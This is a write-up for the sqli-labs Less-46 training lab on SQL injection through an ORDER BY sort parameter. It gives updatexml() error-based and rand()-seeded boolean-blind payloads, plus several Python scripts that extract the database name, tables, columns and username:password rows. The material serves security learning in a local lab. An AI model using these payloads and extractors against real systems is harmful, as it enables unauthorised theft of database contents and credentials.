sqli-labs Less-46: ORDER BY injection
1. Studying the source carefully, it is easy to see that the `sort` parameter is read into `$id` and placed directly after ORDER BY (`SELECT * FROM users ORDER BY $id`), as shown in the source screenshot:
2. Try sorting by a column name:
?sort=username
?sort=password
username: (screenshot of the result order)
password: (screenshot of the result order)
The two orderings are visibly different, which confirms that the parameter is evaluated inside ORDER BY. To turn that into an injection there are two main routes: rand() for a boolean blind oracle, or an error-based function such as updatexml().
Error-based: take the second route. updatexml() with an invalid XPath string leaks the value in the error message, so this works directly:
?sort=updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1)
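The caveat with the error channel is that MySQL only reports the first 32 characters of the bad XPath string, so anything longer than ~30 characters (two are taken by the `~` markers) has to be read in slices with substr(). The following is an added example, not code from the original post: it builds the updatexml() payloads, parses the value back out of the error text, and stitches the slices together. `fake_send`, `FAKE_DB` and the sample values are constructed stand-ins for the Less-46 page so the script runs offline; `send` is whatever function fetches the page with the given `sort` value.

```python
import re

# The value shows up as '~value~' in the XPath error text; 0x7e is '~'.
ERROR_RE = re.compile(r"XPATH syntax error: '~(.*?)~'")

# updatexml() reports at most 32 characters of the bad XPath string and the
# two '~' markers use two of them, so read the value 30 characters at a time.
CHUNK = 30


def updatexml_payload(expr, offset, length=CHUNK):
    """Build the sort= value: one slice of expr wrapped so it lands in the error."""
    return ("updatexml(1,concat(0x7e,substr((%s),%d,%d),0x7e),1)"
            % (expr, offset, length))


def parse_error(page_text):
    """Return the text between the '~' markers, or None if no error was shown."""
    m = ERROR_RE.search(page_text)
    return m.group(1) if m else None


def extract(send, expr):
    """Recover the full value of expr through the error channel.

    send(payload) -> page text. Slices are requested until one comes back
    shorter than CHUNK, which marks the end of the value.
    """
    value = ""
    offset = 1  # substr() is 1-based
    while True:
        chunk = parse_error(send(updatexml_payload(expr, offset)))
        if chunk is None:
            raise RuntimeError("no XPath error in response; is the query erroring?")
        value += chunk
        if len(chunk) < CHUNK:
            return value
        offset += CHUNK


# Two expressions from the usual MySQL walk; group_concat() packs a whole
# result list into one string so it can be read in slices.
DB_NAME = "select database()"
ROWS = "select group_concat(username,0x3a,password) from users"


# --- constructed stand-in for the Less-46 page, so this runs offline ---
FAKE_DB = {
    DB_NAME: "security",
    ROWS: "Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy",
}
_SLICE_RE = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)")


def fake_send(payload):
    """Answer like MySQL would: echo the XPath error, capped at 32 characters."""
    m = _SLICE_RE.search(payload)
    expr, off, ln = m.group(1), int(m.group(2)), int(m.group(3))
    piece = FAKE_DB[expr][off - 1:off - 1 + ln]
    return "XPATH syntax error: '%s'" % ("~" + piece + "~")[:32]


if __name__ == "__main__":
    print(extract(fake_send, DB_NAME))
    print(extract(fake_send, ROWS))
```

Against the live lab, replace `fake_send` with a function that does the GET request and returns the HTML. The slice length is what keeps the trailing `~` inside the 32-character window; if you request longer slices the closing marker is cut off and the regex above stops matching.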
Blind: a true and a false condition sort the rows differently when the condition is used as the seed of rand(), because ORDER BY rand(0) and ORDER BY rand(1) each give a fixed but different order:
?sort=rand(ascii(mid((select%20database()),1,1))>114)
3. Look at the first row of the result and use it as the oracle: in this environment, when the condition is true (rand(1)) the first row returned is the user admin3 (id 3); when it is false a different row comes first. Script:
```python
# -*- coding:utf-8 -*-
"""
@Author: lingchenwudiandexing
@contact: 3131579667@qq.com
@Time: 2024/2/25 16:31
@version: 1.0
"""
import requests
from bs4 import BeautifulSoup

"""
Extract the table names
Extract the column names
Extract the row contents
Time-based form of the same oracle (not used below):
if(ascii(substr(database(),1,1))>100,%20sleep(3),%200)--+
if(ascii(substr(database(),1,1))>110, sleep(3), 0)
"""


def inject_database(url):
    """Recover database() one character at a time with a boolean oracle.

    The condition is the seed of rand(): ORDER BY rand(1) and ORDER BY rand(0)
    give different deterministic row orders, and in this environment rand(1)
    puts the row whose username is admin3 first.
    """
    name = ''
    for i in range(1, 100):
        # binary search over printable ASCII for the i-th character
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "rand(ascii(mid((select database()),%d,1)) > %d)" % (i, mid)
            res = {"sort": payload}
            r = requests.get(url, params=res)   # sort is read from $_GET
            html = r.text
            soup = BeautifulSoup(html, 'html.parser')
            # td[0] is id, td[1] is username of the first row returned
            getUsername = soup.find_all('td')[1].text
            if getUsername == 'admin3':   # condition true: char > mid
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            # ascii('') is 0, so past the end of the name the search collapses
            # to the lower bound: nothing more to read
            break
        name += chr(mid)
        print(name)


if __name__ == "__main__":
    url = 'http://127.0.0.1/sqli/Less-46/index.php'
    inject_database(url)
```
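The script above hard-wires database() and the HTTP request into one loop. The following is an added example, not the author's code: it separates the rand() oracle from the search so the same binary search walks the rest of the usual MySQL path (table names, column names, then rows via group_concat()), and it uses ascii('') = 0 as the end-of-string signal instead of the printable-range lower bound. `http_oracle` talks to the live page with the standard library only and assumes, as the post does, that admin3 is the first username under rand(1); `fake_oracle` and `FAKE_DB` are constructed stand-ins so the block runs offline.

```python
import re
import urllib.parse
import urllib.request

# Expressions to walk MySQL, one string each; group_concat() packs a list.
DB_NAME = "select database()"
TABLES = ("select group_concat(table_name) from information_schema.tables "
          "where table_schema=database()")
COLUMNS = ("select group_concat(column_name) from information_schema.columns "
           "where table_name='users'")
ROWS = "select group_concat(username,0x3a,password) from users"


def sort_payload(expr, pos, threshold):
    """The post's rand() trick: the boolean comparison becomes the seed of rand().

    ORDER BY rand(1) and ORDER BY rand(0) give different deterministic orders,
    so which row comes first reveals the result of the comparison.
    """
    return "rand(ascii(mid((%s),%d,1)) > %d)" % (expr, pos, threshold)


def http_oracle(url, first_username_when_true="admin3"):
    """Oracle that asks the live Less-46 page (not exercised offline).

    first_username_when_true is what the author observed for rand(1); confirm
    it by hand with ?sort=rand(1) and ?sort=rand(0) before relying on it.
    """
    def ask(expr, pos, threshold):
        qs = urllib.parse.urlencode({"sort": sort_payload(expr, pos, threshold)})
        with urllib.request.urlopen(url + "?" + qs) as resp:
            html = resp.read().decode("utf-8", "replace")
        cells = re.findall(r"<td>(.*?)</td>", html, re.S)  # td[1] = first username
        return len(cells) > 1 and cells[1].strip() == first_username_when_true
    return ask


def find_char(ask, expr, pos):
    """Binary search the ASCII code of character pos of expr (0 = past the end).

    ascii('') is 0 in MySQL, so after the last character every 'char > mid'
    answer is false and the search collapses to 0. Seven requests per char.
    """
    low, high = 0, 128
    while low < high:
        mid = (low + high) // 2
        if ask(expr, pos, mid):   # char > mid
            low = mid + 1
        else:
            high = mid
    return low


def extract(ask, expr, max_len=200):
    """Read expr character by character until the end-of-string signal."""
    value = ""
    for pos in range(1, max_len + 1):
        code = find_char(ask, expr, pos)
        if code == 0:
            break
        value += chr(code)
    return value


# --- constructed stand-in for the database, so this runs offline ---
FAKE_DB = {
    DB_NAME: "security",
    TABLES: "emails,referers,uagents,users",
    COLUMNS: "id,username,password",
    ROWS: "Dumb:Dumb,Angelina:I-kill-you",
}


def fake_oracle(expr, pos, threshold):
    """Evaluate ascii(mid(expr,pos,1)) > threshold against FAKE_DB."""
    s = FAKE_DB[expr]
    code = ord(s[pos - 1]) if pos <= len(s) else 0
    return code > threshold


if __name__ == "__main__":
    for expr in (DB_NAME, TABLES, COLUMNS, ROWS):
        print(extract(fake_oracle, expr))
```

Against the lab, `ask = http_oracle("http://127.0.0.1/sqli/Less-46/index.php")` and then `extract(ask, TABLES)` and so on. Check the oracle by hand first: if rand(1) does not put admin3 first in your copy of the lab, pass the username you actually see as `first_username_when_true`, otherwise every comparison reads as false and the extractor returns an empty string.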